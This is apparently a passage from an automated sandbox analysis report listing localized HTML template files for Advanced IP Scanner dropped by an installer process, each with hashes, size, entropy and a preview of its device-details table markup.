Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ja_jp.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1187
Entropy (8bit):	5.11658152620251
Encrypted:	false
SSDEEP:	24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
MD5:	7B64191A23A7F9EF19022435267FED84
SHA1:	3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
SHA-256:	58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
SHA-512:	F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ko_kr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1162
Entropy (8bit):	5.054590965912235
Encrypted:	false
SSDEEP:	12:AMJnuKoh2Oe2B2uT2B6b2MKb2tFb2HcS2RF2TQ2n0Kt1RhRGDbYUzYKeIzAkReEs:lFoMOhsuSrXquHuSr0Kt5RGDBPReEhyv
MD5:	AAFE73E9DD742ECBA22903D3DA498688
SHA1:	AE8580EFD2267042ABB5D6EBC36A0277345BE963
SHA-256:	777877C97D0D8753B28A02666B19729B8E2046A387895CD675EF2E5EEBAE1C7A
SHA-512:	06C7B541638FA292E0438EDBD71733F35988C95A99F10B873299D55D92C66347B974969E31EFEC51B6D9F64859434243BF4252642651DC61E18F067C2A2784E4
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.. ..:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>...</center></b></td><td><b><center>.. .

C:\Program Files (x86)\Advanced IP Scanner\details_panel_lt_lt.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1169
Entropy (8bit):	4.842737243338588
Encrypted:	false
SSDEEP:	24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
MD5:	59A017F97EA0743C741E972819CFEA19
SHA1:	E6480E68B930A8595EACBAC255B3BFAFCC30D466
SHA-256:	71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
SHA-512:	95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami

C:\Program Files (x86)\Advanced IP Scanner\details_panel_lv_lv.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1179
Entropy (8bit):	4.8880159035742965
Encrypted:	false
SSDEEP:	24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
MD5:	1588431C36A3112355553A6967E3405E
SHA1:	0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
SHA-256:	69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
SHA-512:	F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De

C:\Program Files (x86)\Advanced IP Scanner\details_panel_nb_no.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.789609676615686
Encrypted:	false
SSDEEP:	24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
MD5:	C81043ED485CCE96CDA08A5986F04E31
SHA1:	8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
SHA-256:	119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
SHA-512:	56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

C:\Program Files (x86)\Advanced IP Scanner\details_panel_nl_nl.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.79937338549848
Encrypted:	false
SSDEEP:	24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
MD5:	A420CCFD66627A25731173A49B1C98E1
SHA1:	CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
SHA-256:	FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
SHA-512:	99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c

C:\Program Files (x86)\Advanced IP Scanner\details_panel_pl_pl.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.85707182260681
Encrypted:	false
SSDEEP:	12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
MD5:	1AD783BD4AF434D47BD69AB818A91DFA
SHA1:	8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
SHA-256:	2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
SHA-512:	1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_pt_br.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1158
Entropy (8bit):	4.820254321830803
Encrypted:	false
SSDEEP:	24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
MD5:	82043E0E5311A889AD7709A4A735BC76
SHA1:	F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
SHA-256:	9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
SHA-512:	E14FC86BF8DFD07536A357A760CDD2858B3536DF69D7FDA7BE06429E9969116C864D3B6036E1E05EA637621DA69F9BBD6776276C1D520F7140DB2646BB9896C0
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operacional:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usu.rio:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Coment.rios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servi.o</center></b></td><td><b><center>Detalhe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ro_ro.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.803303336966706
Encrypted:	false
SSDEEP:	24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
MD5:	27C167C1E5624DC7F4D0256ABAA8632F
SHA1:	7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
SHA-256:	E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
SHA-512:	C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ru_ru.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.137449444677303
Encrypted:	false
SSDEEP:	24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
MD5:	C09C9A49D20E9E03FBA82E0247B38770
SHA1:	B95253268F788CEB0B603E194C4AB1A7451B2C44
SHA-256:	717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
SHA-512:	BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>......:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............ .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sk_sk.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	4.88658440484172
Encrypted:	false
SSDEEP:	24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
MD5:	E133CA274E9A1C5B55A9AE459656E935
SHA1:	B115F78BD0BA440A10A2ED5093712D7675F3E45C
SHA-256:	D80655A9F288A1207F193025486A876F3B0BF30584F361FF04E8ECEBCB444DA0
SHA-512:	CD4B9AEECE96654B462CF2887C3A6809FA083772016D078172D19C64332D072FE3A1E1F46EF7B1017F3FDAF9F7B0BDC131682BCA50645909FA5BDB807D66B2FB
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robca:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pou..vate.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.re:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnos

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sl_si.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.820312505780483
Encrypted:	false
SSDEEP:	24:lFoJgsuSAXqSH+l70Kt5RGDSRBIReEhyv:HogsRAXqSH+l70U2Di0s
MD5:	D085FB64BFB3757DB202DE6552075927
SHA1:	6D7D1701D2C4A9E4AF18217DD9169E19E1D03F3A
SHA-256:	411862A29DF284FA2D4B2E33FB9839DD030A99EBC5823212E9CDB2FFCFB3EE26
SHA-512:	5BEA33C25F3A28D1138834F6E6D8C2D9BAEAFEE39833980C1EC022ED8EEAE75453747CF844C31232F9F46D77C427F388CF65B070F03ED5C81B166D85BBD41379
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stanje:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacijski sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvajalec:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Uporabnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarji:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Storitev</center></b></td><td><b><center>Podro

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sr_latn_rs.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1152
Entropy (8bit):	4.835031850395569
Encrypted:	false
SSDEEP:	24:lFouJsuSMBXqHHZlL0Kt5RGDV9iReEhyv:HnJsRAXqHHZlL0U2DV9os
MD5:	8723B14E9398038715746AD9E3BDE732
SHA1:	E90F353839A5C6A2AC6DB8D1860D73077CCD6260
SHA-256:	201854FBE199471A6756CAC6649F716653304D03C10E22BB1DD6D3D04BF6E5F9
SHA-512:	F5C813713BEBE817B8C6DCDAB00B6314C667C986589943AA4EC173C924281379387CB92241E265BD3EDFE12D9F0EFA6036DF9C832E7F70D04F9ED88B72478E4C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Detalji</cen

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sv_se.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.808850143987916
Encrypted:	false
SSDEEP:	24:lFouisuSPXqBQqHJl4/0Kt5RGDz9cReEhyv:HnisRPXqWqHJlK0U2Dz9+s
MD5:	3A9608446029B501A8C31084CA170B0E
SHA1:	E6643513E77B23997112741963B24C60EB4DF08C
SHA-256:	2C9A4462B5BCBDBFE9D7C8E167ECA3CC8DF7DD2440BA0BBE2ACA3E21BA1C4AF6
SHA-512:	58A3A091E8C03C6A83C17EF7FDE3A138EFC609FA9928801ACF75EAF7D19DED809B142940598558049AA12E9DB9F4D2C4D057FB10198D8ABCDCE2876FE983B990
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tillverkare:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anv.ndare:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Detaljer</c

C:\Program Files (x86)\Advanced IP Scanner\details_panel_th_th.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1292
Entropy (8bit):	5.135718210930255
Encrypted:	false
SSDEEP:	24:lFo+ag1FGfysuSIIrXqF/w9HUkb830Kt5RGDLeMFG/zReEhyv:Hra4FGfysRxXqMHUkC0U2DqMFG/xs
MD5:	37065F0D6A5CE8F22D831F76A7644D8B
SHA1:	2750F55AC41F0888159604AFBCF70C6B894C01BD
SHA-256:	18B7C895BABB71508CC7F2A5861C493A8FB13D12D2CBD7A2C0441DDDA5C545C2
SHA-512:	8CA493719F739CA680BA666E0C55D4D471C207F1D8E7EC12DB2E93692A1123B94EB07B75311B667E5B31300C90C6009745AFE7F4067D237570091B3BD1ECB45E
Malicious:	false
